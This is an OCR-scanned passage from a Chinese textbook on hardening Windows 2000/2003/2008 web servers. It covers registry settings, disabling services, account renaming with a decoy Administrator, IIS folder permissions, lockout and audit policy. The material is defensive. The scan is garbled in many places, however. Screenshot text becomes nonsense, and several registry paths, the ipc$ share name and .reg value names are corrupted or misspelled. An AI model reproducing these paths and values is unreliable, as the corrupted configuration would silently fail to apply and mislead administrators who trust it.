关闭 并 重新 启动 计算 机 。 要 立即 重新 启动 计算 机 吗 ?的 对 话 框 。 此 时 有 两 种 处 理 办 法 ,二 
者 等 效 。 一 是 回答 "是 ”, 重 启 操作 系统 ,这 种 方式 由 于 要 影响 服务 器 的 连续 工作 ,不 推荐 使 
用 。 另 一 种 方法 是 回答 “ 否 ”, 不 重新 启动 计算 机 。 为 使 配置 生效 ,可 采取 先 禁用 网 卡 ,然后 
再 重新 启用 网 卡 的 方法 来 实现 。 

通过 以 上 配置 后 ,Web 服务 器 就 只 开放 了 Web 服务 和 FTP 服务 所 使 用 的 端口 ,提高 了 
系统 的 安全 性 。 由 于 封禁 了 所 有 UDP 端口 ,这 时 管理 员 无 法 在 Web 服务 器 上 访问 因特网 ， 
因为 无 法 进行 域名 解析 。 如 果 管 理 员 要 临时 通过 Web 服务 器 访问 网 页 ,可 使 用 IP 地 址 进 
行 访问 ,或 者 临时 开放 UDP 协议 的 所 有 端口 。 


4.3.3 修改 注册 表 提 升 安全 性 


Windows 操作 系统 的 一 些 默认 设置 对 安全 性 控制 得 不 是 很 严格 ,可 通过 修改 注册 表 来 
改变 这 些 与 安全 性 相关 的 设置 ,从 而 提高 服务 器 操作 系统 的 安全 性 和 防御 能 力 。 下 面 介 绍 
几 个 常用 的 与 安全 性 相关 的 注册 表 设 置 。 

(1) 修改 注册 表 , 禁 止 枚 举 SAM 账号 和 共享 资源 。 

Windows 2000/2003/2008 Server 默认 允许 任何 用 户 通 过 空 用 户 得 到 操作 系统 的 所 有 
账号 和 共享 列表 ,这 个 本 来 是 为 方便 局 域 网 用 户 共享 文件 而 设计 的 功能 , 却 对 Web 服务 器 
的 账户 安全 带 来 极 大 的 危害 ,因此 必须 禁止 该 种 操作 。 

Mi Windows 的 “开始 "菜单 ,选择 “运行 "菜单 项 .然后 输入 “regedit”, 并 单 击 “ 确 定 ” 按 
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钮 ,启动 注册 表 编 辑 器 。 
在 注册 表 编 辑 器 中 依次 单 击 展开 以 下 注册 表 项 : 


HKEY _LOCRL MACHINE\SYSTEM\ CurrentControlSet\Control\Lsa\ 


单 击 选中 Lsa 注册 表 项 后 ,在 右 侧 的 注册 键 列 表 中 找到 restrictanonymous 注册 键 , 右 
击 ,在 弹出 的 菜单 中 选择 “修改 ”选项 ,然后 将 其 值 修改 为 2。 

restrictanonymous 的 取 值 有 3 个 ,其 取 值 与 功能 含义 如 下 。 

0: None. Rely on default permissions( 默 认 设置 ,无 限制 ,取决 于 默认 权限 ) 。 

1: Do not allow enumeration of SAM accounts and shares( 匿 名 用 户 不 允许 枚 举 SAM 
账号 和 共享 ) 。 

2; No access without explicit anonymous permissions( 没 有 显 式 匿名 权限 就 不 允许 访 
问 , 即 匿名 用 户 无 法 连接 本 机 的 IPC $ 共享 资源 )。 

设置 值 2 是 在 Windows 2000/2003/2008 Server 中 才 支 持 的 , 比 1 值 限制 更 严 ,安全 性 更 高 。 

(2) 修改 注册 表 , 禁 止 自动 共享 。 

Windows 2000/2003/2008 Server 安装 后 ,默认 会 对 各 个 磁盘 和 Windows 的 安装 目录 
进行 共享 ,并 提供 IPCS 共享 。 这 些 共享 对 服务 器 的 安全 也 带 来 极 大 的 安全 威胁 。 

使 用 net share 共享 名 /del 命令 ,虽然 可 以 删除 共享 资源 ,但 这 种 删除 操作 仅 对 本 次 有 
效 , 系 统 重启 后 又 会 自动 共享 。 要 彻底 禁止 系统 自动 共享 ,需要 通过 修改 注册 表 的 设置 来 

在 注册 表 编 辑 器 中 ,依次 单 击 展开 以 下 注册 表 项 : 


HKEY_LOCAL MACHINE\SYSTEM\ CurrentControlSet\Services\ lanmanserver\parameters\ 


单 击 选中 “parameters” 注 册 表 项 ,在 右 侧 键 值 列表 窗口 的 空白 处 右 击 ,在 弹出 的 菜单 中 
选择 “新 建 *>“ 双 字 节 值 ”选项 ,然后 将 键 的 名 称 更 改 为 AutoShareServer, 取 值 保持 其 默认 
的 值 0 即 可 ,重启 操作 系统 后 .就 不 会 对 各 个 盘 符 和 操作 系统 的 安装 目录 进行 自动 共享 了 ， 
但 仍 会 自动 提供 IPC $ 共享 。 为 此 ,可 在 注册 表 的 自动 运行 注册 表 项 下 面 添加 一 个 字符 串 
类 型 的 键 , 其 键 值 设置 “net share ipe $ /del” 命 令 , 通 过 自动 运行 该 命令 来 自动 删除 该 共享 。 

在 注册 表 编 辑 器 中 ,依次 单 击 展 开 以 下 注册 表 项 : 


HKEY_LOCAL, MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ 


单 击 选中 *Run" 注 册 表 项 ,在 右 侧 键 值 列表 窗口 的 空白 处 右 击 ,在 弹出 的 菜单 中 选择 
“新 建 ”一 "字符 串 值 ? 选 项 ,然后 右 击 新 创建 出 的 “新 值 #1" 键 ,在 菜单 中 选择 “ 重 命名 " 选 
项 ,将 该 键 的 名 称 更 名 为 “delipc”, 该 键 的 名 称 可 任意 命名 , 仅 起 标识 作用 。 再 次 右 击 
“delipe” 键 ,在 弹出 的 菜单 中 选择 “修改 ”选项 ,在 弹出 的 对 话 框 的 “数值 数据 "输入 框 中 输入 
要 执行 的 命令 , 即 net share ipe$ /del, 然 后 单 击 “ 确 定 ” 按 钮 关闭 对 话 框 即 可 。 

(3) 修改 注册 表 , 禁 止 运 行 批 处 理 文件 和 DOS Shell 程序 。 

黑客 在 攻击 服务 器 时 ,通常 会 想 办 法 将 木马 程序 .控制 权 提升 的 配套 工具 上 传 到 服务 器 
上 ,并 通过 运行 Shell 程序 来 获得 命令 操作 和 执行 环境 。 为 此 ,可 禁止 DOS Shell 和 批 处 理 
文件 的 执行 。 

在 注册 表 编辑 器 中 ,依次 单 击 展开 以 下 注册 表 项 : 
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HKEY CURRENT USER\Software\Policies\Microsoft\ 


然后 单 击 选 中 “Microsoft” 注 册 表 项 ,在 "Microsoft” 注 册 表 项 上 右 击 ,在 弹出 的 菜单 中 
选择 “新 建 ”一 “项 ”选项 ,然后 将 该 注册 表 项 更 名 为 “Windows”。 

用 同样 的 方法 ,在 新 建 的 Windows 下 面 再 创建 一 个 名 为 “System” 的 注册 表 项 。 

右 击 新 建 的 “System” 注 册 表 项 ,在 弹出 的 菜单 中 选择 “新 建 *>“ 双 字 节 值 ”选项 ,并 将 
键 的 名 称 更 名 为 “DisableCMD”, 接 着 右 击 “DisableCMD” 注 册 键 ,在 弹出 的 菜单 中 选择 “ 修 
改 ” 选 项 ,将 其 值 设置 为 1. 

DisableCMD 注册 键 的 取 值 可 为 0.1 和 2 这 三 个 值 ,其 含义 分 别 如 下 。 

0; 允许 运行 DOS Shell(cmd) 和 批 处 理 文件 。 

1: 禁止 运行 DOS Shell(cmd) 和 批 处 理 文件 。 

2: 禁止 运行 DOS Shell(cmd) 。 

(4) 修改 注册 表 ,提升 系 统 对 SYN 泛 洪 攻 击 和 DDoS 攻击 的 自我 保护 能 力 。 

打开 记事 本 ,创建 一 个 文本 文件 ,输入 以 下 内 容 , 并 将 其 保存 为 扩展 名 为 . reg 的 文件 ， 
然后 通过 双击 该 reg 文件 的 方式 ,将 这 些 配 置 内 容 导 入 注册 表 。 


Windows Registry Editor Version 5.00 

[HKEY_LOCAL, MACHINE\ SYSTEM\ CurrentControlSet\Services\Tcpip\Parameters] 
"EnableSecurityFilters" = dword:00000001 

"SynAttackProtect" = dword:00000002 

"EnableICMPRedirects" = dword:00000000 

"NoNameReleaseOnDemand" = dword:00000001 

"KeepAliveTime" = dword:000493e0 

"TcpMaxHalfOpen" = dword:000001f4 

"TcpMaxHalfOpenRetried" = dword:00000190 

"TcpMaxDataRetransmissions" = dword:00000003 

"TCPMaxPortsExhausted" = dword:00000005 

"TcpTimeWaitDelay" = dword:0000001e 
[HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\Services\AFD\Parameters ] 
"EnableDynamicBacklog" = dword : 00000001 

"MinimumDynamicBacklog" = dword:00000014 

"MaxmumDynamicBacklog" = dword:00004e20 

"DyamicBacklogGrowthDelta" = dword:0000000a 


(5) 修改 注册 表 , 使 IS Web 服务 器 支持 包含 中 文字 符 的 URL 路 径 。 

该 项 设置 与 提升 操作 系统 的 安全 性 无 关 ,但 对 于 Web 服务 器 ,为 使 其 URL 路 径 支 持 中 
文字 符 , 经 常 需要 进行 这 方面 的 修改 , 故 放 在 此 处 一 并 讲解 。 

打开 记事 本 ,输入 以 下 内 容 ,并 将 其 保存 为 扩展 名 为 . reg 的 文件 ,然后 通过 双击 reg X 
件 的 方式 ,将 该 配置 导入 到 注册 表 中 , 即 可 实现 HS Web 服务 器 支持 中 文 路 径 。 

Windows Registry Editor Version 5. 00 

[HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\InetInfo\Parameters] 

"ListenBackLog" = dword:00000019 


"DispatchEntries" = hex(7):4c,00,44,00,41,00,50,00,53,00,56,00,43,00,00,00,00,00 
"FavorDBCS" = dword:00000000 
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4.3.4 禁用 或 停 用 部 分 系统 服务 


出 于 安全 考虑 ,服务 器 应 遵循 服务 最 小 化 原则 。 由 于 各 服务 器 应 用 软件 可 能 存在 已 知 
或 未 知 的 安全 漏洞 ,安装 和 开启 的 服务 越 多 ,安全 风险 也 越 大 ,因此 ,服务 器 通常 只 开启 所 需 
提供 的 服务 ,对 于 不 需 提 供 的 服务 应 做 到 不 安装 或 安装 后 不 启动 服务 ,以 保障 和 提高 服务 器 
的 安全 性 。 

1. 查询 已 开启 的 服务 

网 络 应 用 服务 通常 会 绑 定 到 某 一 个 或 几 个 TCP 或 UDP 端口 来 提供 服务 ,服务 器 应 用 
进程 会 实时 侦 听 指定 的 TCP 或 UDP 端口 ,以 检查 是 否 有 来 自 该 端口 的 服务 请 求 。 不 同 的 
网 络 应 用 服务 所 使 用 的 服务 端口 不 同 , 因 此 ,可 通过 查询 服务 器 当前 所 开启 和 侦 听 的 端口 ， 
来 查询 当前 服务 器 开启 了 哪些 网 络 应 用 服务 。 

要 查询 服务 器 当前 所 开启 的 端口 以 及 该 端口 是 哪 一 个 进程 在 提供 服务 ,可 使 用 "netstat- 
an" 命 令 或 TCPVIEW 工具 软件 。 

2. 网 络 服务 管理 

Windows 2000/2003/2008 Server 操作 系统 提供 了 服务 管理 器 ,利用 该 管理 器 ,可 实现 
对 操作 系统 的 相关 服务 进行 启动 类 型 设置 .启动 ,停止 .暂停 或 恢复 服务 等 操作 。 

在 Windows 开始 菜单 中 选择 “管理 工具 ”一 “服务 "选项, 即 可 打开 服务 管理 器 ,如 图 4.4 
所 示 。 
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人 Appkcation Layer Gatew... 为 Internet 连接 共享 和 windows 防火 ,， 已 启动 ”手动 本 地 服务 
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图 4.4 服务 管理 器 


在 服务 管理 器 的 “状态 ” 栏 中 可 查看 该 项 服务 的 启动 状态 。 启 动 状 态 栏 显示 “已 启动 ” 
的 ,表示 该 项 服务 目前 正 处 于 服务 运行 状态 。 

启动 类 型 有 自动 .手动 和 禁止 3 种 设置 。 自 动 设置 项 表示 该 项 服务 在 操作 系统 启动 时 
会 自动 启动 ; 手动 表示 该 项 服务 在 操作 系统 启动 时 不 会 自动 启动 ,要 由 用 户 通过 发 布 执行 
服务 启动 命令 来 启动 ; 禁止 表示 不 允许 启动 运行 该 项 服务 。 

要 设置 修改 某 项 服务 的 启动 状态 ,首先 在 服务 列表 中 选中 该 项 服务 ,然后 右 击 ,在 弹出 
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当 从 此 处 局 动 服务 时 ， 燃 可 指定 所 适用 的 启动 参数 . 


后 动 蕊 数 吕 ) [ 


图 4.5 服务 属性 设置 对 话 框 


在 该 对 话 框 中 ,可 根据 需要 设置 服务 的 启动 类 型 .启动 或 停止 服务 。 同 时 也 可 查看 各 服 
务 间 的 依存 关系 。 

出 于 安全 考虑 ,通常 应 禁用 Task Scheduler, Remote Registry 和 Terminal Services 服 
务 。 这 些 服务 在 默认 情况 下 是 自动 启动 运行 的 。 若 使 用 和 管理 不 当 , 会 对 服务 器 带 来 严重 
的 安全 威胁 。 比 如 , Terminal Services 服务 ,车 用 户 的 账户 管理 不 严格 ,存在 弱 口 令 账 户 , 则 
攻击 者 很 容易 利用 弱 口 令 账 户 ,借助 终端 服务 实现 对 服务 器 的 远程 和 人 侵 与 控制 。 


4.3.5 严格 管理 用 户 账 户 与 权限 


操作 系统 的 账户 和 密码 是 登录 和 连接 访问 服务 器 资源 进行 身份 验证 和 权限 分 配 的 凭 
证 。 对 操作 系统 账户 进行 严格 管理 ,对 权限 进行 合理 分 配 ,是 保障 和 提升 服务 器 安全 的 一 个 
重要 措施 ,对 服务 器 的 安全 至 关 重 要 。 

下 面 从 账户 的 管理 和 权限 分 配方 面 介绍 提升 和 保障 服务 器 安全 常用 的 一 些 安全 措施 。 

1. 严格 用 户 账户 的 管理 

操作 系统 的 账户 应 根据 需要 进行 合理 的 创建 ,不 要 创建 得 太 多 ,让 系统 存在 过 时 未 使 用 
的 账户 。 另 外 ,每 一 个 系统 账户 必须 设置 一 个 强壮 的 密码 ,不 允许 存在 弱 密 码 或 空 密码 的 
账户 。 

一 个 强壮 的 密码 通常 应 同时 包含 大 小 写 英文 字母 .0 一 9 的 数字 和 特殊 字符 ,每 一 类 的 
字符 建议 至 少 3 个 ,因此 ,密码 位 数 建议 至 少 12 位 。 

另外 ,对 于 账户 密码 的 保管 ,也 要 加 强 管理 。 为 防止 密码 外 泄 ,通常 应 定期 更 换 密码 。 

2. 对 Administrator 账户 更 名 

Windows 操作 系统 的 系统 管理 员 账户 的 名 称 为 Administrator, 这 是 大 家 所 共 知 的 。 攻 
击 者 也 通常 会 试 着 猜测 该 账户 的 密码 。 除 了 给 账户 设置 一 个 强壮 的 密码 之 外 ,为 进一步 防 
止 攻击 者 对 密码 的 猜测 ,通常 应 将 系统 管理 员 账 户 进行 更 名 ,将 其 更 改 为 一 个 不 容易 被 猜 到 
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的 账户 名 称 。 

3. 对 系统 管理 员 账 户 设 置 一 个 “ 密 缸 陷阱 

将 系统 管理 员 账 户 更 名 后 ,还 可 进一步 对 系统 管理 员 账 户 设置 一 个 * 密 饶 陷 阱 ”让 攻击 
者 去 猜 ,耗费 其 时 间 和 精力 。 其 设置 方法 如 下 : 新 创建 一 个 名 为 Administrator 的 账户 , 然 
后 设置 一 个 非常 复杂 ,非常 强壮 的 密码 ,并 给 这 个 账户 分 配 最 小 的 权限 ,让 这 个 账户 什么 事 
也 做 不 了 。 

以 后 攻击 者 猜测 Administrator 账户 的 密码 时 ,其 猜测 的 仅 是 一 个 普通 用 户 账户 ,而 且 
该 账户 没有 什么 权限 ,即使 猜测 到 密码 ,也 无 法 对 系统 的 安全 构成 威胁 。 

4. 对 账户 权限 的 分 配 采 取 最 小 化 权限 的 原则 

(1) 账户 权限 的 分 配 原则 与 权限 的 确定 方法 

对 服务 器 允许 访问 的 资源 , 除 给 系统 管理 员 分 配 完全 控制 权限 (全 部 权限 ) 之 外 ,其 余 用 
户 账 户 应 根据 该 账户 应 该 具有 的 最 小 权限 来 进行 分 配 设 置 ,不 要 设置 超出 其 功能 实现 之 外 
的 ,更 高 的 权限 。 例 如 ,对 于 Web 服务 器 站 点 根 目录 的 权限 设置 ,对 于 Internet 匿名 账户 ， 
对 站 点 根 目 录 只 需 读 的 权限 ,在 设置 权限 时 ,只 需 设置 一 个 读 权限 即 可 ,不 要 分 配 写 权 限 或 
执行 权限 给 该 账户 ,否则 将 给 站 点 的 安全 带 来 严重 的 安全 威胁 。 

对 于 Windows 操作 系统 ,一 个 账户 对 哪些 资源 拥有 什么 权限 ,不 是 在 账户 创建 时 指定 ， 
而 是 在 资源 的 安全 属性 中 进行 设置 。Windows 操作 系统 在 默认 设置 下 ,对 账户 的 权限 分 配 
较为 宽松 ,Everyone 账户 默认 设置 为 完全 控制 ,这 对 系统 安全 极为 不 利 , 因 此 ,必须 根据 应 
用 的 需要 对 服务 器 允许 访问 的 资源 进行 详细 的 、 合 理 的 、 严 格 的 权限 分 配 设置 。 

用 户 访问 Web 服务 器 时 ,IIS 服务 进程 使 用 的 是 Internet 匿名 账户 的 身份 ,从 网 站 的 根 
目录 读 取 用 户 要 访问 的 网 页 ,因此 ,对 于 网 站 根 目录 的 权限 设置 ,只 需 设 置 以 下 两 方面 的 权 
限 即 可 ,对 于 系统 默认 设置 的 其 他 账户 的 权限 ,应 一 律 删除 。 

D 设置 系统 管理 员 账 户 对 其 具有 完全 控制 权限 。 

© 设置 Internet 匿名 账户 对 其 具有 读 的 权限 。 

Windows 操作 系统 默认 设置 的 权限 列表 是 针对 Administrators( 管 理 员 组 ) 用 户 组 设置 
的 权限 。 这 种 设置 方法 存在 安全 缺陷 .主要 表现 在 如 果 攻 击 者 成 功 添 加 了 一 个 新 的 账户 ,并 
将 该 账户 成 功 添加 到 了 Administrators 用 户 组 , 则 攻击 者 所 添加 的 账户 ,就 具有 与 系统 管 
理 员 账 户 相 同 的 权限 。 为 此 ,更 安全 的 做 法 是 ,删除 对 管理 员 用 户 组 (Administrators) 的 
权限 设置 ,添加 对 具体 的 管理 员 账 户 的 权限 设置 。 这 样 ,由 于 没有 设置 管理 员 用 户 组 对 
资源 的 访问 权限 ,攻击 者 所 添加 的 账户 虽然 在 管理 员 用 户 组 中 ,但 对 于 资源 同样 是 没有 
访问 权限 的 。 

如 果 Web 服务 器 同时 安装 和 启动 了 IIS 的 FTP 服务 功能 ,并 且 需 要 利用 操作 系统 的 
某 一 个 系统 账户 (比如 upnews) ,通过 FTP 连接 来 上 传 和 下 载 网 页 ,实现 对 网 站 的 远程 维护 
管理 。 此 时 ,网 站 的 根 目录 还 应 增加 对 upnews 账户 的 权限 设置 ,否则 ,用 upnews 账户 进行 
FTP 登录 连接 时 ,将 因 无 权 访问 该 资源 而 导致 连接 失败 。 

要 上 传 .下 载 、 删 除 或 修改 网 站 的 文件 ,通常 需要 给 用 于 实现 FTP 登录 连接 的 账户 分 
配 读 取 、 写 入 、 列 出 文件 夹 目 录 和 修改 权限 。 值 得 注意 的 是 ,在 分 配 了 修改 权限 之 后 ,该 
账户 也 就 同时 拥有 了 “ 读 取 和 运行 "权限 。 一 个 账户 拥有 了 运行 权限 ,就 具有 执行 应 用 程 
序 的 能 力 。 
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(2) 权限 的 设置 方法 


对 于 服务 器 上 允许 用 户 访 问 的 资源 ,一 定 要 根据 不 同 用 户 所 允许 的 访问 存 取 权限 ,进行 


详细 设置 ,不 能 采用 操作 系统 默认 的 权限 设置 。 


21]. 
在 要 设置 访问 存 取 权 限 的 文件 或 文件 夹 上 右 sm as ae |w #g|8=x| 


击 , 在 弹出 的 菜单 中 选择 “属性 ?选项 ,打开 文件 或 关中 
文件 夹 属性 设置 对 话 框 。 在 该 对 话 框 中 选择 “ 安 
全 "选项 卡 , 在 该 选项 卡 中 即 可 完成 对 访问 权限 的 
设置 或 修改 。“ 安 全 ”选项 卡 设置 界面 如 图 4. 6 


默认 情况 下 ,操作 系统 设置 了 Administrators、 
CREATOR OWNER 、 SYSTEM 和 Users 4 个 用 
户 组 对 资源 拥有 访问 权限 ,而 且 这 些 访 问 权 限 是 


添加 中) LALY 
所 示 。 
回 
回 
m 
m 
m 


从 当前 的 整个 磁盘 分 区 的 根 目录 继承 下 来 的 ,各 sammasuamiwascmas. 


权限 设置 项 的 勾 选 标 志 呈 灰色 显示 ,还 不 能 直接 


拒绝 
口 
口 
口 
口 
口 
口 
高 级 


e 


进行 修改 。 min HW 


在 如 图 4.6 所 示 的 对 话 框 中 , 单 击 “ 高 级 ” 按 
钮 ,打开 高 级 设置 对 话 框 ,如 图 4.7 所 示 。 


mywebsite 的 高 领 安全 设置 ?x 


BR “| 审核 | 所 有 者 | 有 效 权限 | 
要 查看 有 关 特 天 权限 的 详细 信息 ， 请 作 择 一 个 权限 项 目 ， 然 后 单 击 “AA” . 


语 六 件 天 ,于 文件 
中 广 人 及 和 
该 文件 赤 久子 文 件 天 


smv.. | ao | WE) | 
É 区 许 父 项 的 继承 权限 传播 到 该 对 象 和 所 有 子 对 象 。 包 括 那些 在 此 明确 定义 的 项 目 (A). 
厂 用 在 此 显示 的 可 以 应 用 到 子 对 象 的 项 目 普 代 所 有 子 对 象 的 权限 项 目 O 


进一步 了 解 访问 控制 。 


ww |u 


图 4.7 权限 的 高 级 设置 对 话 框 


图 4.6 访问 权限 设置 


单 击 “允许 父 项 的 继承 权限 传播 到 该 对 象 和 所 有 子 对 象 ,包括 那些 在 此 明确 定义 的 项 
目 ”, 取 消 对 该 项 的 勾 选 。 在 弹出 的 询问 对 话 框 中 , 单 击 " 复 制 按 钮 ,可 将 父 对 象 的 权限 复制 
给 当前 要 设置 权限 的 对 象 , 单 击 * 删 除 ? 按 钮 ,删除 当前 对 象 从 父 对 象 所 继续 来 的 权限 , 单 击 
“取消 "按钮 ,可 中 止 取消 该 项 操作 。 建 议 单 击 删 除 ” 按 钮 ,删除 从 父 对 象 所 继承 来 的 权限 ， 


然后 再 根据 应 用 的 需要 ,添加 设置 具体 账户 的 访问 权限 。 


单 击 “ 删 除 ? 按 钮 后 ,将 关闭 询问 对 话 框 . 返 回 到 权限 的 高 级 设置 对 话 框 ,在 该 对 话 框 中 
单 击 “ 确 定 ” 按 钮 ,返回 到 权限 的 设置 对 话 框 ,此 时 的 设置 界面 如 图 4. 8 所 示 。 
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在 “组 或 用 户 名 称 ” 列 表 中 选择 “Administrators” 用 户 组 ,然后 单 击 * 删 除 ”按钮 ,删除 对 
Administrators 用 户 组 的 权限 设置 。 
单 击 “ 添 加 ”按钮 ,添加 要 设置 权限 的 用 户 或 用 户 组 。 此 时 将 打开 如 图 4.9 所 示 的 对 话 
框 。 单 击 “* 高 级 ”按钮 ,然后 在 新 打开 的 对 话 框 中 单 击 “立即 查找 "按钮 ,将 当前 操作 系统 的 用 
户 和 用 户 组 搜索 显示 在 列表 框 中 ,以 供用 户 选 择 要 设置 权限 的 用 户 或 用 户 组 ,如 图 4. 10 
所 示 。 
KIE) 


* | 共享 ”安全 |və 共享 | 自 定义 | 


RAPERO: 
E Aininistrators (WIN2K3\Adninistrators) 


mojeo | [empPa z 


Administrators 的 权限 Œ) = = =s 
口 口 JP. mens Apsena 
Ë 日 HERO: 
o o == ev | 
pS n n 辆 入 对 象 名 称 来 选择 TM V: 
- Ee ss em 
确定 取消 PFH (A) m= | wa | 


图 4.8 取消 从 父 对 象 权限 继承 后 的 图 4.9 选择 要 设置 权限 的 用 户 或 用 户 组 
权限 设置 对 话 框 


在 用 户 和 用 户 组 列表 框 中 ,选择 要 设置 权限 的 用 户 或 用 户 组 。 可 采取 按 住 Ctrl 键 不 
放 , 用 鼠标 单 击 的 方式 ,进行 多 项 选择 。 

对 于 Web 站 点 的 根 文件 夹 ,通常 要 设置 权限 的 账户 有 系统 管理 员 账 户 、Internet 匿名 
账户 (IUSR_ 主 机 名 ) IIS 进程 账户 (I1WAM _ 主 机 名 ,用 于 启动 HS 进程 ) 。 对 于 同时 支持 对 
ASP. net 页 面 提供 解析 服务 的 站 点 ,还 应 添加 设置 ASPNET 账户 和 IIS_WPG(IIS 工作 进 
程 组 ) 用 户 组 的 访问 权限 。 

在 如 图 4. 10 所 示 的 对 话 框 中 ,选择 好 要 设置 权限 的 用 户 或 用 户 组 后 , 单 击 “确定 "按钮 ， 
返回 到 如 图 4. 9 所 示 的 对 话 框 ,然后 单 击 " 确 定 "按钮 ,返回 到 权限 设置 对 话 框 , 如 图 4. 11 
所 示 。 

要 设置 权限 的 用 户 账户 和 用 户 组 选择 好 后 ,就 可 分 别针 对 这 些 账 户 进行 详细 的 权限 设 

了 。 设 置 方 法 是 先 在 “组 或 用 户 名 称 ” 列 表 框 中 选中 要 设置 权限 的 用 户 或 组 ,然后 在 下 面 
的 权限 列表 中 勾 选 相 应 的 权限 。 权 限 分 为 允许 权限 和 拒绝 权限 。 人 允许 权限 表示 该 账户 具有 
这 方面 的 权限 ,拒绝 权限 表示 该 账户 禁止 具有 这 方面 的 权限 ,其 优先 级 高 于 允许 权限 。 

在 本 示例 中 ,ucadmin 是 更 名 的 系统 管理 员 账 户 , 应 具有 全 部 权限 。 选 中 该 账户 后 ,在 
权限 设置 列表 中 可 直接 单 击 * 完 全 控制 "权限 项 的 允许 匀 选 框 ,为 其 分 配 全 部 权限 。 

对 于 ASP 网 站 ,访问 网 页 使 用 的 是 Internet 匿名 账户 (来 宾 账 户 ), 需 要 为 其 分 配 “ 读 
取 ” 的 权限 。“ 列 出 文件 夹 目录 ?的 权限 可 分 配给 该 账户 ,也 可 不 分 配 。 若 网 站 根 目录 下 面 还 
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图 4.10 搜索 查找 用 户 和 用 户 组 图 4.11 选择 好 用 户 账户 和 用 户 组 的 
权限 设置 对 话 框 


有 一 个 用 于 存储 Access 数据 库 文件 的 子 文件 夹 ' 则 对 于 该 子 文件 夹 ,Internet 匿名 账户 还 
应 为 其 分 配 * 写 人 ?权限 。 对 于 该 账户 ,注意 不 要 为 其 分 配 * 读 取 和 和 运行" 权限。 

对 于 HS 进程 账户 ,允许 权限 全 部 取消 ,并 在 拒绝 权限 栏 中 色 选 “ 写 入 ”权限 ,明确 指定 
该 账户 禁止 拥有 ”* 写 人 ”权限 。 对 于 该 项 权限 设置 ,主要 是 防止 攻击 者 通过 溢出 攻击 ,获得 
HS 进程 的 权限 后 ,获得 “ 写 入 "权限 。 

ASPNET 和 IIS_WPG 是 ASP. net 页 面 正常 解析 需要 设置 相应 权限 的 账户 。 与 
Internet 匿名 账户 相同 ,给 这 两 个 账户 分 配 “ 读 取 ” 和 *“ 列 出 文件 夹 目录 ”权限 即 可 。 

权限 设置 好 后 , 单 击 “* 确 定 ” 按 钮 , 即 可 完成 对 资源 访问 权限 的 设置 。 除 了 分 别针 对 各 文 
件 夹 进行 权限 设置 以 外 ,也 可 针对 某 一 个 磁盘 的 根 目录 进行 整体 的 访问 权限 设置 。 


4.3.6 开启 账户 策略 和 系统 审核 策略 


1. 开启 账户 策略 

账户 策略 包括 密码 策略 和 账户 锁定 策略 两 方面 ,开启 账户 策略 有 助 于 进一步 提升 账户 
的 安全 。 

选择 “开始 ”一 “管理 工具 ”一 “本 地 安全 策略 "菜单 项 ,打开 “本 地 安全 设置 ”对话 框 ,如 
图 4.12 所 示 。 

可 根据 需要 对 密码 的 长 度 、 复 杂 性 要 求 、 有 效 性 等 方面 进行 设置 ,以 保证 密码 的 强壮 性 。 

账户 锁定 策略 主要 用 于 防止 用 户 猜 测 密码 ,在 连续 几 次 输 错 密码 后 ,系统 将 自动 对 账户 
进行 加 锁 ,不 允许 该 账户 登录 连接 系统 。 人 允许 连续 输 错 密码 的 次 数 和 加 锁 时 间 可 在 账户 锁 
定 策略 中 进行 设置 。 

在 如 图 4.12 所 示 的 对 话 框 中 选择 “账户 锁定 策略 ”选项 , 即 可 切换 到 对 账户 锁定 策略 的 
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图 4.12 “本 地 安全 设置 ”对话 框 


文件 中 MED SEV HWY 
€ > Am Bem 


图 4.13 设置 账户 锁定 策略 


设置 界面 ,如 图 4.13 所 示 。 
在 如 图 4.13 所 示 的 设置 界面 中 双击 “账户 锁 定 阔 值 ”选项 ,打开 账户 锁定 阔 值 的 设置 对 
话 框 ,如 图 4. 14 所 示 。 
aixi 
本 地 安全 设置 | 解释 这 个 设置 | 


= 


帐户 不 镇 定 。 
E 


图 4.14 设置 账户 锁定 的 阔 值 


在 如 图 4. 14 所 示 的 对 话 框 中 单 击 带 向 上 箭头 的 调整 按钮 ,设置 无 效 登 录 加 锁 账 户 的 次 
数 ,比如 设置 为 3, 然 后 单 击 “ 确 定 ? 按 钮 ,此 时 将 弹出 如 图 4. 15 所 示 的 对 话 框 ,在 该 对 话 框 
中 ,直接 单 击 " 确 定 ? 按 钮 ,完成 对 账户 锁定 策略 的 设置 ,设置 好 后 的 界面 如 图 4. 16 所 示 。 


111 


La 
Eh wpasinm DIRITE o waman, 下 列 项 目的 计生 改 成 建 的 数 


复位 贝 尸 是 定 计数 器 不 适用 30 分 钟 之 后 
帐户 锁定 时 间 不 适用 30 分 名 


E 


4 到 


忻 限制 第 略 
5 8 安全 第 略 , 在 本 地 计算 机 


图 4.16 设置 好 账户 锁定 策略 后 的 对 话 框 


2. 系统 审核 策略 

开启 系统 审核 策略 后 ,操作 系统 才 会 对 一 些 事件 进行 日 志 记 录 。 日 志 记 录 有 助 于 管理 
员 了 解 服务 器 在 过 去 的 一 段 时 间 内 所 发 生 的 事件 。 对 于 了 解 和 把 控 服 务 器 的 安全 至 关 

在 如 图 4. 12 所 示 的 对 话 框 中 选择 “本 地 策略 "选项 ,可 切换 到 对 审核 策略 的 设置 界面 ， 
如 图 4.17 所 示 。 可 根据 应 用 的 需要 ,对 各 类 事件 的 成 功 或 失败 进行 审核 ,并 开启 对 应 的 日 
志 记录 。 


文件 (E) REA 查看 (V) 帮助 (H) 
£ > Amx eem 
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图 4.17 设置 审核 策略 


在 如 图 4.17 所 示 的 对 话 框 右 侧 的 事件 列表 框 中 ,双击 要 设置 审核 策略 的 事件 ,打开 对 
事件 审核 策略 的 设置 对 话 框 ,如 图 4. 18 所 示 。 审 核 分 为 事件 操作 “成 功 ”" 和 “失败 ”两 类 。 若 
勾 选 “成 功 ?选项 , 则 对 于 该 事件 (比如 登录 事件 ) 成 功 的 操作 (登录 系统 成 功 ) 将 被 记 和 日志。 
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若 同时 色 选 了 * 失 败 ” 选 项 , 则 失败 的 操作 也 将 被 记 入 日志。 
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图 4.18 设置 事件 的 审核 策略 


可 根据 需要 ,对 各 类 事件 的 成 功 或 失败 操作 开启 审核 。 审 核 策略 设置 好 后 ,可 选择 * 开 
始 " 一 “管理 工具 "一 “事件 查看 器 "菜单 项 ,来 查看 事件 的 日 志 记 录 , 如 图 4. 19 所 示 。 
-=|Glx| 
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图 4.19 查看 系统 事件 日 志 


